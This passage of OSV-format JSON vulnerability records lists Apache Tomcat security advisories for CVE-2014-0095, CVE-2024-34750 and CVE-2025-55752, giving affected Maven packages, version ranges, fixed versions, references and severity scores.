"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-wf5v-jhxj-q632", "published": "2022-05-17T00:24:30Z", "modified": "2024-11-28T05:36:07.555519Z", "aliases": [ "CVE-2014-0095" ], "summary": "Denial of service in Apache Tomcat", "details": "java/org/apache/coyote/ajp/AbstractAjpProcessor.java in Apache Tomcat 8.x before 8.0.4 allows remote attackers to cause a denial of service (thread consumption) by using a \"Content-Length: 0\" AJP request to trigger a hang in request processing.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0-RC1" }, { "fixed": "8.0.4" } ] } ], "versions": [ "8.0.0-RC1", "8.0.0-RC10", "8.0.0-RC3", "8.0.0-RC5", "8.0.1", "8.0.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-wf5v-jhxj-q632/GHSA-wf5v-jhxj-q632.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0-RC1" }, { "fixed": "8.0.4" } ] } ], "versions": [ "8.0.0-RC1", "8.0.0-RC10", "8.0.0-RC3", "8.0.0-RC5", "8.0.1", "8.0.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-wf5v-jhxj-q632/GHSA-wf5v-jhxj-q632.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-0095" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/8884dae60ace77a87ed9385442ce429e98c3a479" }, { "type": "WEB", "url": "https://github.com/apache/tomcat80/commit/77590c897f0e542fe363d70efdf3b82209510aee" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://web.archive.org/web/20140713043210/http://www.securitytracker.com/id/1030300" }, { "type": "WEB", "url": "https://web.archive.org/web/20141126170141/http://www.securityfocus.com/bid/67673" }, { "type": "WEB", "url": "https://web.archive.org/web/20151017043748/http://secunia.com/advisories/60729" }, { "type": "WEB", "url": "https://web.archive.org/web/20161024215453/http://secunia.com/advisories/59873" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2014/May/134" }, { "type": "WEB", "url": "http://svn.apache.org/viewvc?view=revision\u0026revision=1578392" }, { "type": "WEB", "url": "http://tomcat.apache.org/security-8.html" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678231" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681528" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2024-01-08T20:19:10Z", "nvd_published_at": "2014-05-31T11:17:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-wm9w-rjj3-j356", "published": "2024-07-03T21:39:44Z", "modified": "2025-11-03T22:02:29.679753Z", "aliases": [ "BIT-tomcat-2024-34750", "CVE-2024-34750" ], "related": [ "CGA-xv4j-9m39-wrpw" ], "summary": "Apache Tomcat - Denial of Service", "details": "Improper Handling of Exceptional Conditions, Uncontrolled Resource Consumption vulnerability in Apache Tomcat. When processing an HTTP/2 stream, Tomcat did not handle some cases of excessive HTTP headers correctly. This led to a miscounting of active HTTP/2 streams which in turn led to the use of an incorrect infinite timeout which allowed connections to remain open which should have been closed. \n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M20, from 10.1.0-M1 through 10.1.24, from 9.0.0-M1 through 9.0.89. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 though 8.5.100.\n\nUsers are recommended to upgrade to version 11.0.0-M21, 10.1.25 or 9.0.90, which fixes the issue.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.0-M21" } ] } ], "versions": [ "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-wm9w-rjj3-j356/GHSA-wm9w-rjj3-j356.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.25" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-wm9w-rjj3-j356/GHSA-wm9w-rjj3-j356.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M1" }, { "fixed": "9.0.90" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-wm9w-rjj3-j356/GHSA-wm9w-rjj3-j356.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.0-M21" } ] } ], "versions": [ "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-wm9w-rjj3-j356/GHSA-wm9w-rjj3-j356.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.25" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-wm9w-rjj3-j356/GHSA-wm9w-rjj3-j356.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M1" }, { "fixed": "9.0.90" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-wm9w-rjj3-j356/GHSA-wm9w-rjj3-j356.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.0", "8.5.100", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-wm9w-rjj3-j356/GHSA-wm9w-rjj3-j356.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.0", "8.5.100", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-wm9w-rjj3-j356/GHSA-wm9w-rjj3-j356.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34750" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/2344a4c0d03e307ba6b8ab6dc8b894cc8bac63f2" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/2afae300c9ac9c0e516e2e9de580847d925365c3" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/9fec9a82887853402833a80b584e3762c7423f5f" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/4kqf0bc9gxymjc2x7v3p7dvplnl77y8l" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/07/msg00009.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240816-0004" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html" } ], "database_specific": { "cwe_ids": [ "CWE-400", "CWE-755" ], "github_reviewed": true, "github_reviewed_at": "2024-07-05T20:39:41Z", "nvd_published_at": "2024-07-03T20:15:04Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-wmwf-9ccg-fff5", "published": "2025-10-27T18:31:13Z", "modified": "2025-11-05T21:07:34.950738Z", "aliases": [ "CVE-2025-55752" ], "related": [ "CGA-ffp8-8jhj-qx69", "CGA-wr6g-phvx-mg75", "CGA-xrp3-jgrh-29hf" ], "summary": "Apache Tomcat Vulnerable to Relative Path Traversal", "details": "The fix for bug 60013 introduced a regression where the rewritten URL was normalized before it was decoded. This introduced the possibility that, for rewrite rules that rewrite query parameters to the URL, an attacker could manipulate the request URI to bypass security constraints including the protection for /WEB-INF/ and /META-INF/. If PUT requests were also enabled then malicious files could be uploaded leading to remote code execution. PUT requests are normally limited to trusted users and it is considered unlikely that PUT requests would be enabled in conjunction with a rewrite that manipulated the URI.\n\n\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.10, from 10.1.0-M1 through 10.1.44, from 9.0.0.M11 through 9.0.108.\n\nThe following versions were EOL at the time the CVE was created but are known to be affected: 8.5.6 though 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.11 or later, 10.1.45 or later or 9.0.109 or later, which fix the issue.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.11" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.10", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-wmwf-9ccg-fff5/GHSA-wmwf-9ccg-fff5.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.45" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.42", "10.1.43", "10.1.44", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-wmwf-9ccg-fff5/GHSA-wmwf-9ccg-fff5.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M11" }, { "fixed": "9.0.109" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.106", "9.0.107", "9.0.108", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-wmwf-9ccg-fff5/GHSA-wmwf-9ccg-fff5.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.60" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.100", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-wmwf-9ccg-fff5/GHSA-wmwf-9ccg-fff5.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.11" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.10", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-wmwf-9ccg-fff5/GHSA-wmwf-9ccg-fff5.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.45" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.42", "10.1.43", "10.1.44", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-wmwf-9ccg-fff5/GHSA-wmwf-9ccg-fff5.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M11" }, { "fixed": "9.0.109" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.106", "9.0.107", "9.0.108", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-wmwf-9ccg-fff5/GHSA-wmwf-9ccg-fff5.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.60" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.100", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-wmwf-9ccg-fff5/GHSA-wmwf-9ccg-fff5.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.11" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.10", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-wmwf-9ccg-fff5/GHSA-wmwf-9ccg-fff5.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": 